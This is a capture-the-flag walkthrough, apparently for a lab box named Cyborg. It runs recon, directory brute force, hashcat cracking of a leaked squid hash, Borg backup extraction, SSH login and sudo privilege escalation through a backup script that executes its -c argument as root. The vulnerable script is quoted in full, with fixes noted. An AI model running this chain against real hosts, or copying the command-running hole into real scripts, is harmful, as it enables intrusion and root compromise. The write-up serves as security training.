My attack chain for Cyborg. Web content enumeration, cracking a Borg backup and some bash code review.
# Command log for the Cyborg box: recon, web enumeration, offline hash
# cracking, Borg archive extraction, SSH login, then sudo-based privesc.
# This is a transcript, not a runnable script: the commands after the ssh
# line are typed on the target, not on the attacking host.
export ip=<redacted>
# recon
# Default scan first, then version detection and default scripts (-sVC) on the
# two open ports, with the normal-format report saved via -oN.
nmap $ip
nmap $ip -sVC -p 22,80 -oN nmap-sVC-$ip.txt
# | Port | Service |
# | ---- | ------------------------------------ |
# | 22 | ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 |
# | 80 | http Apache httpd 2.4.18 |
# enumeration
# Directory brute force against the web root with the SecLists common.txt list.
gobuster dir --url $ip -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
# --------------------------------------------------------------------
# /admin (Status: 301) [Size: 312] [--> http://10.10.239.18/admin/]
# /etc (Status: 301) [Size: 310] [--> http://10.10.239.18/etc/]
# /index.html (Status: 200) [Size: 11321]
# Root cause of everything below: /etc and /admin are served from the document
# root without authentication, so a config directory and a backup archive are
# readable by anyone. Keeping both out of the web root closes this chain.
# `http` is presumably the HTTPie client; each page is saved for offline review.
http http://$ip/index.html > http.html
http http://$ip/admin/ > http$ip-admin.html
http http://$ip/etc/ > http$ip-etc.html
# exploitation - hashcat
# The squid passwd file is fetched straight over HTTP; cut keeps field 2 (the
# hash) and drops the user name in front of the colon.
http http://$ip/etc/squid/passwd | cut -d':' -f2 > squid-passwd.hash
# --show only prints hashes hashcat has already cracked, so it is run before
# and after the actual attack.
hashcat squid-passwd.hash --show
# -m 1600 is hashcat's mode for Apache $apr1$ MD5, matching the hash below.
# The password was recovered from rockyou.txt, i.e. it is a publicly known
# password; a unique passphrase would not have fallen to this wordlist.
hashcat -m 1600 squid-passwd.hash /usr/share/wordlists/rockyou.txt -o squid-passwd-solved.txt
hashcat squid-passwd.hash --show
# $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:s********
# exploitation - borg backups > ssh
# The Borg repository is shipped inside a tar file downloadable from /admin/.
wget http://$ip/admin/archive.tar
tar -xvf archive.tar
cd home/field/dev
borg list final_archive
# The passphrase noted here appears to be the squid password cracked above:
# one credential reused for the proxy and for the backup encryption.
borg extract home/field/dev/final_archive::music_archive #p:squidward
# The backup contains alex's home directory; the note read here evidently held
# the SSH password used on the next line (plaintext credential in a backup).
cat home/alex/Desktop/secret.txt
ssh alex@$ip #p:S3*******3
# privEsc: sudo script
# From here on the commands run on the target as alex.
sudo -l
cat /etc/mp3backups/backup.sh
# backup.sh executes the value of -c (see its listing), so running it through
# sudo runs that value as root. sudo logs the full command line, so the -c
# argument is visible in the sudo log entry for this invocation.
sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"
The backup.sh script used for privesc; its -c option runs whatever command it is given:
#!/bin/bash
# backup.sh as read from /etc/mp3backups/ on the target. It lists every .mp3
# on the system, tars a fixed set of files from /home/alex/Music, and then
# executes the argument of -c. The walkthrough runs it through sudo, so that
# last step runs a caller-chosen command as root.
#
# Fix: remove the -c option and the `cmd=$($command)` line; a backup job has no
# need to run caller-supplied commands. On the sudoers side, following the
# command path with "" in the rule makes sudo refuse any arguments.

# Search the whole filesystem for .mp3 files and write the list to
# backed_up_files.txt (tee also echoes it to stdout). The inner sudo calls are
# redundant when the script itself is already started through sudo.
sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt
# `input` is only referenced by the commented-out loop below.
input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
#a="/etc/mp3backups/backed_up_files.txt"
# b=$(basename $input)
#echo
# echo "$line"
#done < "$input"
# Option parsing: -c takes one argument, stored in `command` with no
# validation or allow-list. Other options hit no case arm and are ignored.
while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
done
# Hard-coded, space-separated list of files to archive.
backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"
# Where to backup to.
dest="/etc/mp3backups/"
# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"
# Print start status message.
# NOTE(review): the trailing `echo` looks like a separate statement whose line
# break was lost in this listing; as written, the word "echo" is appended to
# the printed message.
echo "Backing up $backup_files to $dest/$archive_file"echo
# Backup the files using tar.
# $backup_files is left unquoted so the list splits into one argument per file;
# $dest already ends in "/", so the archive path contains a harmless "//".
tar czf $dest/$archive_file $backup_files
# Print end status message.
echo
echo "Backup finished"
# VULNERABLE: the -c value is expanded unquoted and run as a command with the
# script's privileges; its stdout is captured in `cmd`. The expansion is
# word-split but not re-parsed as shell syntax, so quoting is not the fix:
# the line has to go. With no -c given, `command` is empty and nothing runs.
cmd=$($command)
# Unquoted, so the captured output is word-split and glob-expanded on print.
echo $cmd